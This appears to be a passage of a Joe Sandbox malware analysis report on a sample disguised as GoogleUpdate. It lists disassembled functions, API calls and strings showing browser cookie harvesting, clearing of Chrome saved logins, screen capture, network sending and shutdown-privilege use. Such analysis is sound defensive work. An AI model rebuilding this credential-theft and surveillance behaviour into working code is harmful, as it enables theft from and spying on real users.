Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: EnumServicesStatus$ErrorLastManagerOpen
String ID:
API String ID: 3587775597-0
Opcode ID: 81e72d1dcc13280ed1879cf9f090714b21071ed40770cb220e29a79454c2b8af
Instruction ID: 6ce88c058296d2c3b0169cbae3b24baff62e3479be35c2318cb4853598c639b3
Opcode Fuzzy Hash: 81e72d1dcc13280ed1879cf9f090714b21071ed40770cb220e29a79454c2b8af
Instruction Fuzzy Hash: 04814071104344ABC304FB62DC959AFB7E8FF94708F50092EF58552192EE78EA49CB9A

Function 0040B28E Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040B2DC
FindNextFileW.KERNEL32(00000000,?), ref: 0040B3AF
FindClose.KERNEL32(00000000), ref: 0040B3BE
FindClose.KERNEL32(00000000), ref: 0040B3E9

Strings

AppData, xrefs: 0040B299
\Mozilla\Firefox\Profiles\, xrefs: 0040B2AF
\cookies.sqlite, xrefs: 0040B34A

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 1164774033-405221262
Opcode ID: 11542885cda4c16d1920560b98fd398d06e3d747a1d9c41d39899ef57f372abe
Instruction ID: 883258bb694cc85cc249d311a8318fbda55549897f82b44e5d780b3967986c9e
Opcode Fuzzy Hash: 11542885cda4c16d1920560b98fd398d06e3d747a1d9c41d39899ef57f372abe
Instruction Fuzzy Hash: 7D31533190025996CB14FBA1DC9ADEE7778AF50718F10017FF405B21D2EFBC9A4A8A8D

Function 004128E3 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 485registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129B8
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129C4

Part of subcall function 00404A81: send.WS2_32(FFFFFFFF,00000000,00000000,00000000,0040545D,?,?,00000004,?,?,00000004,?,00471E90,?), ref: 00404B16

LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 00412CBA
GetProcAddress.KERNEL32(00000000), ref: 00412CC1

Strings

Shlwapi.dll, xrefs: 00412CB5
SHDeleteKeyW, xrefs: 00412CB0

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: AddressCloseCreateLibraryLoadProcsend
String ID: SHDeleteKeyW$Shlwapi.dll
API String ID: 2127411465-314212984
Opcode ID: fa0de1f175a1557feb00b840cfe6c9673a013f69383183f764d230263201d944
Instruction ID: 16181ac17c5890234a95f9c719cc05f83ad3eef33587bd03cd2ae8bf1541d7ce
Opcode Fuzzy Hash: fa0de1f175a1557feb00b840cfe6c9673a013f69383183f764d230263201d944
Instruction Fuzzy Hash: CCE1DA72A0430067CA14B776DD57DAF36A8AF91318F40053FF946F71E2EDBD8A44829A

Function 0040A953 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040A98F
GetLastError.KERNEL32 ref: 0040A999

Strings

\AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040A95A
[Chrome StoredLogins not found], xrefs: 0040A9B3
[Chrome StoredLogins found, cleared!], xrefs: 0040A9BF
UserProfile, xrefs: 0040A95F

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
API String ID: 2018770650-1062637481
Opcode ID: de97d65e3799a6e0596e62218f2c5adfc51664b458c632a8240d65e96125f996
Instruction ID: b2134abed7c3f614b53a5a28bf05479c5c2a11b403a78876888f6ce5fd1f590e
Opcode Fuzzy Hash: de97d65e3799a6e0596e62218f2c5adfc51664b458c632a8240d65e96125f996
Instruction Fuzzy Hash: 7801F271B9020466CA047A75DC2B8BE7728A921304B90057FF402732E2FE7D8A1586CF

Function 00415C90 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
GetLastError.KERNEL32 ref: 00415CDB

Strings

SeShutdownPrivilege, xrefs: 00415CB0

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 3534403312-3733053543
Opcode ID: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
Instruction ID: ffc0972e6e84a8b4c82c7ff824774f91a9d221977230a9de1ecf93d0fe8dbf87
Opcode Fuzzy Hash: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
Instruction Fuzzy Hash: 0AF03A71901229ABDB10ABA1ED4DEEF7F7CEF05616F510060B805A2152D6749A04CAB5

Function 0040838E Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00408393

Part of subcall function 00404A81: send.WS2_32(FFFFFFFF,00000000,00000000,00000000,0040545D,?,?,00000004,?,?,00000004,?,00471E90,?), ref: 00404B16

__CxxThrowException@8.LIBVCRUNTIME ref: 0040842F
FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040848D
FindNextFileW.KERNEL32(00000000,?), ref: 004084E5
FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 004084FC
FindClose.KERNEL32(00000000), ref: 004086F4

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$Exception@8FirstH_prologNextThrowsend
String ID:
API String ID: 3277409220-0
Opcode ID: 534d6322ab01780cc4b5619258ebe056bbf8924c9103abb572c2cd789b0ad75b
Instruction ID: 071b26812b5e49f88d0361c7bacc9152bfce797c8686ce15524b94070306fde2
Opcode Fuzzy Hash: 534d6322ab01780cc4b5619258ebe056bbf8924c9103abb572c2cd789b0ad75b
Instruction Fuzzy Hash: 4FB18D329001099BCB14FBA1CD92AEDB378AF50318F50416FE506B71E2EF785B49CB98

Function 00417AAB Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 245fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 00417D01
FindNextFileW.KERNEL32(00000000,?,?), ref: 00417DCD

Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228

Strings

`'G, xrefs: 00417DE4
H"G, xrefs: 00417BA1
`'G, xrefs: 00417C7E

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: File$Find$CreateFirstNext
String ID: H"G$`'G$`'G
API String ID: 341183262-2774397156
Opcode ID: c3e5c594fd594ffbde7648241e1acae5dfb8bfc7b807ac84b70cab4847e33b49
Instruction ID: cc65440c5fe1593426504ff8613f72b7370ef7481f3bf724e026da4e35a467e2
Opcode Fuzzy Hash: c3e5c594fd594ffbde7648241e1acae5dfb8bfc7b807ac84b70cab4847e33b49
Instruction Fuzzy Hash: 138183315083415BC314FB62C996DEFB7A8AF90304F40493FF586671E2EF789A49C69A

Function 00414DB4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00415C90: GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
Part of subcall function 00415C90: OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
Part of subcall function 00415C90: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
Part of subcall function 00415C90: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
Part of subcall function 00415C90: GetLastError.KERNEL32 ref: 00415CDB

ExitWindowsEx.USER32(00000000,00000001), ref: 00414E56
LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00414E6B
GetProcAddress.KERNEL32(00000000), ref: 00414E72

Strings

SetSuspendState, xrefs: 00414E61
PowrProf.dll, xrefs: 00414E66

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
String ID: PowrProf.dll$SetSuspendState
API String ID: 1589313981-1420736420
Opcode ID: 26b14eece71e4d13eaab4e965927ec332996d302ea5694147255bd3539dff505
Instruction ID: 748c18e79ee5f9a1fbb6f05bd7ad52209f91b0004c4d1b0055552a3b76c5c1f9
Opcode Fuzzy Hash: 26b14eece71e4d13eaab4e965927ec332996d302ea5694147255bd3539dff505
Instruction Fuzzy Hash: 5F214F7070430157CE14FBB19896AAF6359AFD4349F40097FB5026B2D2EE7DCC4986AE

Function 0044F61C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 0044F6B5
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 0044F6DE
GetACP.KERNEL32 ref: 0044F6F3

Strings

OCP, xrefs: 0044F670
ACP, xrefs: 0044F63A

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
Instruction ID: bf1e89585aec8fc6a823a5c6a63220f2d7696aba51182a9853130589b0d37fa4
Opcode Fuzzy Hash: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
Instruction Fuzzy Hash: 2221C122A00101A6F7348F24C901A9B73AAAF50B65F578577E809C7221FB36DD4BC398

Function 004087A0 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004087A5
FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040881D
FindNextFileW.KERNEL32(00000000,?), ref: 00408846
FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040885D

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstH_prologNext
String ID:
API String ID: 1157919129-0
Opcode ID: eff2ab803e63303553496c3eac6518fb39641dae111ed5945c7a25284e51344d
Instruction ID: 37d480644902bd8bd77a9749fd647df5a3db5b19bbca398f696489d34b7b99bb
Opcode Fuzzy Hash: eff2ab803e63303553496c3eac6518fb39641dae111ed5945c7a25284e51344d
Instruction Fuzzy Hash: 12814D329001199BCB15EBA1DD929ED73B8AF54308F10427FE446B71E2EF385B49CB98

Function 0044F7F0 Relevance: 7.7, APIs: 5, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3

Part of subcall function 00445725: _free.LIBCMT ref: 00445784
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 00445791

GetUserDefaultLCID.KERNEL32 ref: 0044F8FC
IsValidCodePage.KERNEL32(00000000), ref: 0044F957
IsValidLocale.KERNEL32(?,00000001), ref: 0044F966
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0044F9AE
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 0044F9CD

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID:
API String ID: 745075371-0
Opcode ID: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
Instruction ID: 3a6be996f1d9ea25600d7609fa1d0555167a50dcc121ad64ff78238f3932635f
Opcode Fuzzy Hash: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
Instruction Fuzzy Hash: 0351A271900215AFFB20EFA5DC41BBF77B8AF08301F05447BE914EB251E7789A088769

Function 00407848 Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040784D
FindFirstFileW.KERNEL32(00000000,?,004632A8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407906
__CxxThrowException@8.LIBVCRUNTIME ref: 0040792E
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040793B
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407A51

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Find$File$CloseException@8FirstH_prologNextThrow
String ID:
API String ID: 1771804793-0
Opcode ID: 0c0ef18f2275b3e10c81759ed4882e8cdfc0df5b16c45a42bc3541e3cef5600d
Instruction ID: 4b9324871479917b5af30c26e04a30266e6971a3e86a210f007197118c0b57fe
Opcode Fuzzy Hash: 0c0ef18f2275b3e10c81759ed4882e8cdfc0df5b16c45a42bc3541e3cef5600d
Instruction Fuzzy Hash: 18516372904208AACB04FBA1DD969DD7778AF11308F50417FB846771E2EF389B49CB99

Function 0041A76C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041A861

Part of subcall function 0041215F: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 0041216E
Part of subcall function 0041215F: RegSetValueExA.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000,?,?,00412385,?,00000000), ref: 00412196
Part of subcall function 0041215F: RegCloseKey.ADVAPI32(00000000,?,?,00412385,?,00000000,?,?,?,?,0gj,00472248), ref: 004121A1

Strings

WallpaperStyle, xrefs: 0041A7AC, 0041A7DF, 0041A82F
Control Panel\Desktop, xrefs: 0041A7A7, 0041A7DA, 0041A82A
TileWallpaper, xrefs: 0041A84B

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: CloseCreateInfoParametersSystemValue
String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
API String ID: 4127273184-3576401099
Opcode ID: f596ae5af9bf33204b26619baa0d18e1563d856132adf7f8c82eb4cc627f6b2d
Instruction ID: 146807b905f8226e4159dba151db05d0611ea4827dca33b530162433be1e3f9d
Opcode Fuzzy Hash: f596ae5af9bf33204b26619baa0d18e1563d856132adf7f8c82eb4cc627f6b2d
Instruction Fuzzy Hash: 7C119671F8024037D514353A4D6BBAE18199343B50F54016BB6022B6CAF8EE4EA553DF

Function 0044EEB8 Relevance: 6.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3

IsValidCodePage.KERNEL32(00000000), ref: 0044EF9A
_wcschr.LIBVCRUNTIME ref: 0044F02A
_wcschr.LIBVCRUNTIME ref: 0044F038
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 0044F0DB

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID:
API String ID: 4212172061-0
Opcode ID: b042c09d22adbd0a465f75c66fe4c588d2498b30252692f7cd71b119f9e6cb68
Instruction ID: 651119c321e801f17dd1a7ba429a2dceeb4aa1bed9d5f8a21b6634afb1069130
Opcode Fuzzy Hash: b042c09d22adbd0a465f75c66fe4c588d2498b30252692f7cd71b119f9e6cb68
Instruction Fuzzy Hash: 8E61E935600606AAFB24AB36DC46BB773A8FF44714F14047FF905D7282EB78E9488769

Function 00416E7E Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 307windowmemoryCOMMON

Download Yara Rule

APIs

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00416E98
CreateCompatibleDC.GDI32(00000000), ref: 00416EA5

Part of subcall function 004172DF: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 0041730F

CreateCompatibleBitmap.GDI32(00000000,?), ref: 00416F1B
DeleteDC.GDI32(00000000), ref: 00416F32
DeleteDC.GDI32(00000000), ref: 00416F35
DeleteObject.GDI32(00000000), ref: 00416F38
SelectObject.GDI32(00000000,00000000), ref: 00416F59
DeleteDC.GDI32(00000000), ref: 00416F6A
DeleteDC.GDI32(00000000), ref: 00416F6D
StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00416F91
GetCursorInfo.USER32(?), ref: 00416FAF
GetIconInfo.USER32(?,?), ref: 00416FC5
DeleteObject.GDI32(?), ref: 00416FF4
DeleteObject.GDI32(?), ref: 00417001
DrawIcon.USER32(00000000,?,?,?), ref: 0041700E
GetObjectA.GDI32(00000000,00000018,?), ref: 00417026
LocalAlloc.KERNEL32(00000040,00000001), ref: 00417095
GlobalAlloc.KERNEL32(00000000,?), ref: 00417104
GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00417128
DeleteDC.GDI32(?), ref: 0041713C
DeleteDC.GDI32(00000000), ref: 0041713F
DeleteObject.GDI32(00000000), ref: 00417142
GlobalFree.KERNEL32(?), ref: 0041714D
DeleteObject.GDI32(00000000), ref: 00417201
GlobalFree.KERNEL32(?), ref: 00417208
DeleteDC.GDI32(?), ref: 00417218
DeleteDC.GDI32(00000000), ref: 00417223

Strings

DISPLAY, xrefs: 00416E91

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
String ID: DISPLAY
API String ID: 4256916514-865373369
Opcode ID: f009d80305bc9d5ab30ccb11e59cfdd7849c6e1eaeca7cb289485d8ed373fceb
Instruction ID: 4ba325f74191387ade15767708145f982ef5b1c7ca4df498548f130554e7309d
Opcode Fuzzy Hash: f009d80305bc9d5ab30ccb11e59cfdd7849c6e1eaeca7cb289485d8ed373fceb
Instruction Fuzzy Hash: 6FB16A315083009FD720DF24DC44BABBBE9EF88755F41482EF98993291DB38E945CB5A

